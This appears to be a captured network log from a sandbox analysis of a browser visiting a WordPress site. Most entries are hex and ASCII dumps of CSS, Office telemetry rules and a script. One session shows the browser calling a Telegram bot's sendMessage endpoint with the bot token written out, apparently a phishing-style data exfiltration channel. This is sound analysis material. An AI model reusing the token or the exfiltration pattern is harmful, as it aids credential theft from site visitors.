                                                                                                                      2024-12-03 07:55:11 UTC478INData Raw: 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 62 6c 75 73 68 2d 62 6f 72 64 65 61 75 78 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 35 34 2c 32 30 35 2c 31 36 35 29 20 30 25 2c 72 67 62 28 32 35 34 2c 34 35 2c 34 35 29 20 35 30 25 2c 72 67 62 28 31 30 37 2c 30 2c 36 32 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 6c 75 6d 69 6e 6f 75 73 2d 64 75 73 6b 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 35 35 2c 32 30 33 2c 31 31 32 29 20 30 25 2c 72 67 62 28 31 39 39 2c 38 31 2c 31 39 32 29 20 35 30 25 2c 72 67 62 28 36 35 2c 38 38 2c 32 30 38 29 20 31 30 30 25 29 3b 2d 2d 77 70
                                                                                                                      Data Ascii: 100%);--wp--preset--gradient--blush-bordeaux: linear-gradient(135deg,rgb(254,205,165) 0%,rgb(254,45,45) 50%,rgb(107,0,62) 100%);--wp--preset--gradient--luminous-dusk: linear-gradient(135deg,rgb(255,203,112) 0%,rgb(199,81,192) 50%,rgb(65,88,208) 100%);--wp
                                                                                                                      2024-12-03 07:55:11 UTC2INData Raw: 0d 0a
                                                                                                                      Data Ascii:
                                                                                                                      2024-12-03 07:55:11 UTC8192INData Raw: 32 30 30 30 0d 0a 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 6d 69 64 6e 69 67 68 74 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 2c 33 2c 31 32 39 29 20 30 25 2c 72 67 62 28 34 30 2c 31 31 36 2c 32 35 32 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 64 75 6f 74 6f 6e 65 2d 2d 64 61 72 6b 2d 67 72 61 79 73 63 61 6c 65 3a 20 75 72 6c 28 27 23 77 70 2d 64 75 6f 74 6f 6e 65 2d 64 61 72 6b 2d 67 72 61 79 73 63 61 6c 65 27 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 64 75 6f 74 6f 6e 65 2d 2d 67 72 61 79 73 63 61 6c 65 3a 20 75 72 6c 28 27 23 77 70 2d 64 75 6f 74 6f 6e 65 2d 67 72 61 79 73 63 61 6c 65 27 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 64 75 6f
                                                                                                                      Data Ascii: 2000;--wp--preset--gradient--midnight: linear-gradient(135deg,rgb(2,3,129) 0%,rgb(40,116,252) 100%);--wp--preset--duotone--dark-grayscale: url('#wp-duotone-dark-grayscale');--wp--preset--duotone--grayscale: url('#wp-duotone-grayscale');--wp--preset--duo
                                                                                                                      2024-12-03 07:55:11 UTC6INData Raw: 27 74 65 78 74 2f
                                                                                                                      Data Ascii: 'text/
                                                                                                                      2024-12-03 07:55:11 UTC2INData Raw: 0d 0a
                                                                                                                      Data Ascii:
                                                                                                                      2024-12-03 07:55:11 UTC8192INData Raw: 32 30 30 30 0d 0a 63 73 73 27 3e 0a 68 74 6d 6c 20 62 6f 64 79 5b 64 61 74 61 2d 68 65 61 64 65 72 2d 72 65 73 69 7a 65 3d 22 31 22 5d 20 2e 63 6f 6e 74 61 69 6e 65 72 2d 77 72 61 70 2c 20 68 74 6d 6c 20 62 6f 64 79 5b 64 61 74 61 2d 68 65 61 64 65 72 2d 66 6f 72 6d 61 74 3d 22 6c 65 66 74 2d 68 65 61 64 65 72 22 5d 5b 64 61 74 61 2d 68 65 61 64 65 72 2d 72 65 73 69 7a 65 3d 22 30 22 5d 20 2e 63 6f 6e 74 61 69 6e 65 72 2d 77 72 61 70 2c 20 68 74 6d 6c 20 62 6f 64 79 5b 64 61 74 61 2d 68 65 61 64 65 72 2d 72 65 73 69 7a 65 3d 22 30 22 5d 20 2e 63 6f 6e 74 61 69 6e 65 72 2d 77 72 61 70 2c 20 62 6f 64 79 5b 64 61 74 61 2d 68 65 61 64 65 72 2d 66 6f 72 6d 61 74 3d 22 6c 65 66 74 2d 68 65 61 64 65 72 22 5d 5b 64 61 74 61 2d 68 65 61 64 65 72 2d 72 65 73 69 7a
                                                                                                                      Data Ascii: 2000css'>html body[data-header-resize="1"] .container-wrap, html body[data-header-format="left-header"][data-header-resize="0"] .container-wrap, html body[data-header-resize="0"] .container-wrap, body[data-header-format="left-header"][data-header-resiz
                                                                                                                      2024-12-03 07:55:11 UTC6INData Raw: 5f 72 6f 77 2d 66
                                                                                                                      Data Ascii: _row-f
                                                                                                                      2024-12-03 07:55:11 UTC2INData Raw: 0d 0a
                                                                                                                      Data Ascii:
                                                                                                                      2024-12-03 07:55:11 UTC8192INData Raw: 32 30 30 30 0d 0a 6c 75 69 64 20 2e 76 63 5f 63 6f 6c 2d 73 6d 2d 32 5b 63 6c 61 73 73 2a 3d 22 76 63 5f 63 6f 6c 2d 73 6d 2d 22 5d 3a 66 69 72 73 74 2d 63 68 69 6c 64 3a 6e 6f 74 28 5b 63 6c 61 73 73 2a 3d 22 6f 66 66 73 65 74 22 5d 29 2c 2e 76 63 5f 72 6f 77 2d 66 6c 75 69 64 20 2e 76 63 5f 63 6f 6c 2d 73 6d 2d 32 5b 63 6c 61 73 73 2a 3d 22 76 63 5f 63 6f 6c 2d 73 6d 2d 22 5d 3a 6e 74 68 2d 63 68 69 6c 64 28 32 6e 2b 33 29 3a 6e 6f 74 28 5b 63 6c 61 73 73 2a 3d 22 6f 66 66 73 65 74 22 5d 29 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 30 3b 7d 7d 2e 63 6f 6c 2e 70 61 64 64 69 6e 67 2d 31 2d 70 65 72 63 65 6e 74 20 3e 20 2e 76 63 5f 63 6f 6c 75 6d 6e 2d 69 6e 6e 65 72 2c 2e 63 6f 6c 2e 70 61 64 64 69 6e 67 2d 31 2d 70 65 72 63 65 6e 74 20 3e 20 2e 6e 2d 73 74
                                                                                                                      Data Ascii: 2000luid .vc_col-sm-2[class*="vc_col-sm-"]:first-child:not([class*="offset"]),.vc_row-fluid .vc_col-sm-2[class*="vc_col-sm-"]:nth-child(2n+3):not([class*="offset"]){margin-left:0;}}.col.padding-1-percent > .vc_column-inner,.col.padding-1-percent > .n-st


                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                      55192.168.2.44981513.107.246.63443
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-03 07:55:08 UTC192OUTGET /rules/rule120639v0s19.xml HTTP/1.1
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Accept-Encoding: gzip
                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                      2024-12-03 07:55:09 UTC470INHTTP/1.1 200 OK
                                                                                                                      Date: Tue, 03 Dec 2024 07:55:09 GMT
                                                                                                                      Content-Type: text/xml
                                                                                                                      Content-Length: 423
                                                                                                                      Connection: close
                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:36 GMT
                                                                                                                      ETag: "0x8DC582BB7564CE8"
                                                                                                                      x-ms-request-id: 3eca19a5-d01e-005a-2410-417fd9000000
                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                      x-azure-ref: 20241203T075509Z-174f7845968pght8hC1EWRyvxg00000008vg000000001hrp
                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                      X-Cache: TCP_HIT
                                                                                                                      Accept-Ranges: bytes
                                                                                                                      2024-12-03 07:55:09 UTC423INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 44 64 5d 5b 59 79 5d 5b 4e 6e 5d 5b 41 61 5d 5b 42 62 5d 5b 4f 6f 5d 5b 4f 6f 5d 5b 4b 6b 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30
                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120639" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120637" /> <SR T="2" R="([Dd][Yy][Nn][Aa][Bb][Oo][Oo][Kk])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0


                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                      56192.168.2.44981613.107.246.63443
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-03 07:55:09 UTC192OUTGET /rules/rule120640v0s19.xml HTTP/1.1
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Accept-Encoding: gzip
                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                      2024-12-03 07:55:09 UTC470INHTTP/1.1 200 OK
                                                                                                                      Date: Tue, 03 Dec 2024 07:55:09 GMT
                                                                                                                      Content-Type: text/xml
                                                                                                                      Content-Length: 478
                                                                                                                      Connection: close
                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:48 GMT
                                                                                                                      ETag: "0x8DC582B9B233827"
                                                                                                                      x-ms-request-id: 1fa1b817-401e-0067-5691-3f09c2000000
                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                      x-azure-ref: 20241203T075509Z-174f7845968cdxdrhC1EWRg0en00000015fg00000000b4en
                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                      X-Cache: TCP_HIT
                                                                                                                      Accept-Ranges: bytes
                                                                                                                      2024-12-03 07:55:09 UTC478INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120640" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120639" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                      57192.168.2.44981713.107.246.63443
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-03 07:55:09 UTC192OUTGET /rules/rule120641v0s19.xml HTTP/1.1
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Accept-Encoding: gzip
                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                      2024-12-03 07:55:09 UTC470INHTTP/1.1 200 OK
                                                                                                                      Date: Tue, 03 Dec 2024 07:55:09 GMT
                                                                                                                      Content-Type: text/xml
                                                                                                                      Content-Length: 404
                                                                                                                      Connection: close
                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:39 GMT
                                                                                                                      ETag: "0x8DC582B95C61A3C"
                                                                                                                      x-ms-request-id: 13e6cbbb-001e-005a-04a3-43c3d0000000
                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                      x-azure-ref: 20241203T075509Z-174f7845968cdxdrhC1EWRg0en00000015gg000000009f7m
                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                      X-Cache: TCP_HIT
                                                                                                                      Accept-Ranges: bytes
                                                                                                                      2024-12-03 07:55:09 UTC404INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4d 6d 5d 5b 53 73 5d 5b 49 69 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53
                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120641" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120639" /> <SR T="2" R="^([Mm][Ss][Ii])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S


                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                      58192.168.2.44981813.107.246.63443
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-03 07:55:09 UTC192OUTGET /rules/rule120642v0s19.xml HTTP/1.1
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Accept-Encoding: gzip
                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                      2024-12-03 07:55:09 UTC470INHTTP/1.1 200 OK
                                                                                                                      Date: Tue, 03 Dec 2024 07:55:09 GMT
                                                                                                                      Content-Type: text/xml
                                                                                                                      Content-Length: 468
                                                                                                                      Connection: close
                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:24 GMT
                                                                                                                      ETag: "0x8DC582BB046B576"
                                                                                                                      x-ms-request-id: be7987d0-001e-0034-1e91-3fdd04000000
                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                      x-azure-ref: 20241203T075509Z-174f7845968frfdmhC1EWRxxbw00000015t00000000011xg
                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                      X-Cache: TCP_HIT
                                                                                                                      Accept-Ranges: bytes
                                                                                                                      2024-12-03 07:55:09 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120642" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120641" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      59192.168.2.449819149.154.167.2204434284C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-03 07:55:10 UTC401OUTGET /bot7615492389:AAFVZ9OmchXY56FM3hDvp-X0kY0cMmXg2qE/sendMessage HTTP/1.1
                                                                                                                      Host: api.telegram.org
                                                                                                                      Connection: keep-alive
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                      Accept: */*
                                                                                                                      Sec-Fetch-Site: none
                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                      2024-12-03 07:55:10 UTC346INHTTP/1.1 400 Bad Request
                                                                                                                      Server: nginx/1.18.0
                                                                                                                      Date: Tue, 03 Dec 2024 07:55:10 GMT
                                                                                                                      Content-Type: application/json
                                                                                                                      Content-Length: 80
                                                                                                                      Connection: close
                                                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                      2024-12-03 07:55:10 UTC80INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 30 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 42 61 64 20 52 65 71 75 65 73 74 3a 20 6d 65 73 73 61 67 65 20 74 65 78 74 20 69 73 20 65 6d 70 74 79 22 7d
                                                                                                                      Data Ascii: {"ok":false,"error_code":400,"description":"Bad Request: message text is empty"}


                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                      60192.168.2.44982013.107.246.63443
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-03 07:55:11 UTC192OUTGET /rules/rule120643v0s19.xml HTTP/1.1
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Accept-Encoding: gzip
                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                      2024-12-03 07:55:11 UTC470INHTTP/1.1 200 OK
                                                                                                                      Date: Tue, 03 Dec 2024 07:55:11 GMT
                                                                                                                      Content-Type: text/xml
                                                                                                                      Content-Length: 400
                                                                                                                      Connection: close
                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:28 GMT
                                                                                                                      ETag: "0x8DC582BB2D62837"
                                                                                                                      x-ms-request-id: 63cec36f-201e-0071-5230-45ff15000000
                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                      x-azure-ref: 20241203T075511Z-174f7845968jrjrxhC1EWRmmrs00000015vg000000001h2q
                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                      X-Cache: TCP_HIT
                                                                                                                      Accept-Ranges: bytes
                                                                                                                      2024-12-03 07:55:11 UTC400INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4c 6c 5d 5b 47 67 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22
                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120643" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120641" /> <SR T="2" R="^([Ll][Gg])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S T="


                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                      61192.168.2.44982113.107.246.63443
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-03 07:55:11 UTC192OUTGET /rules/rule120644v0s19.xml HTTP/1.1
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Accept-Encoding: gzip
                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                      2024-12-03 07:55:11 UTC470INHTTP/1.1 200 OK
                                                                                                                      Date: Tue, 03 Dec 2024 07:55:11 GMT
                                                                                                                      Content-Type: text/xml
                                                                                                                      Content-Length: 479
                                                                                                                      Connection: close
                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:37 GMT
                                                                                                                      ETag: "0x8DC582BB7D702D0"
                                                                                                                      x-ms-request-id: 8dfbf447-101e-0028-0f8e-3f8f64000000
                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                      x-azure-ref: 20241203T075511Z-174f7845968qj8jrhC1EWRh41s00000015pg000000001qan
                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                      X-Cache: TCP_HIT
                                                                                                                      Accept-Ranges: bytes
                                                                                                                      2024-12-03 07:55:11 UTC479INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120644" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120643" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      62192.168.2.449813196.22.142.1434434284C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-03 07:55:11 UTC569OUTGET /wp-includes/js/wp-emoji-release.min.js?ver=6.1.7 HTTP/1.1
                                                                                                                      Host: www.itnaledi.co.za
                                                                                                                      Connection: keep-alive
                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                      Accept: */*
                                                                                                                      Sec-Fetch-Site: same-origin
                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                      Sec-Fetch-Dest: script
                                                                                                                      Referer: https://www.itnaledi.co.za/
                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                      2024-12-03 07:55:11 UTC297INHTTP/1.1 200 OK
                                                                                                                      Date: Tue, 03 Dec 2024 07:55:11 GMT
                                                                                                                      Server: Apache
                                                                                                                      Upgrade: h2,h2c
                                                                                                                      Connection: Upgrade, close
                                                                                                                      Last-Modified: Fri, 02 Dec 2022 09:25:24 GMT
                                                                                                                      ETag: "48b9-5eed4ead72900"
                                                                                                                      Accept-Ranges: bytes
                                                                                                                      Content-Length: 18617
                                                                                                                      Vary: Accept-Encoding
                                                                                                                      Content-Type: application/javascript
                                                                                                                      2024-12-03 07:55:11 UTC7895INData Raw: 2f 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 2f 2f 20 53 6f 75 72 63 65 3a 20 77 70 2d 69 6e 63 6c 75 64 65 73 2f 6a 73 2f 74 77 65 6d 6f 6a 69 2e 6d 69 6e 2e 6a 73 0a 76 61 72 20 74 77 65 6d 6f 6a 69 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 66 3d 7b 62 61 73 65 3a 22 68 74 74 70 73 3a 2f 2f 74 77 65 6d 6f 6a 69 2e 6d 61 78 63 64 6e 2e 63 6f 6d 2f 76 2f 31 34 2e 30 2e 32 2f 22 2c 65 78 74 3a 22 2e 70 6e 67 22 2c 73 69 7a 65 3a 22 37 32 78 37 32 22 2c 63 6c 61 73 73 4e 61 6d 65 3a 22 65 6d 6f 6a 69 22 2c 63 6f 6e 76 65 72 74 3a 7b 66 72 6f 6d 43 6f 64 65 50 6f 69 6e 74 3a 66 75 6e 63 74 69 6f 6e 28 64 29 7b 64 3d 22 73 74 72 69 6e 67 22 3d 3d 74 79 70
                                                                                                                      Data Ascii: /*! This file is auto-generated */// Source: wp-includes/js/twemoji.min.jsvar twemoji=function(){"use strict";var f={base:"https://twemoji.maxcdn.com/v/14.0.2/",ext:".png",size:"72x72",className:"emoji",convert:{fromCodePoint:function(d){d="string"==typ
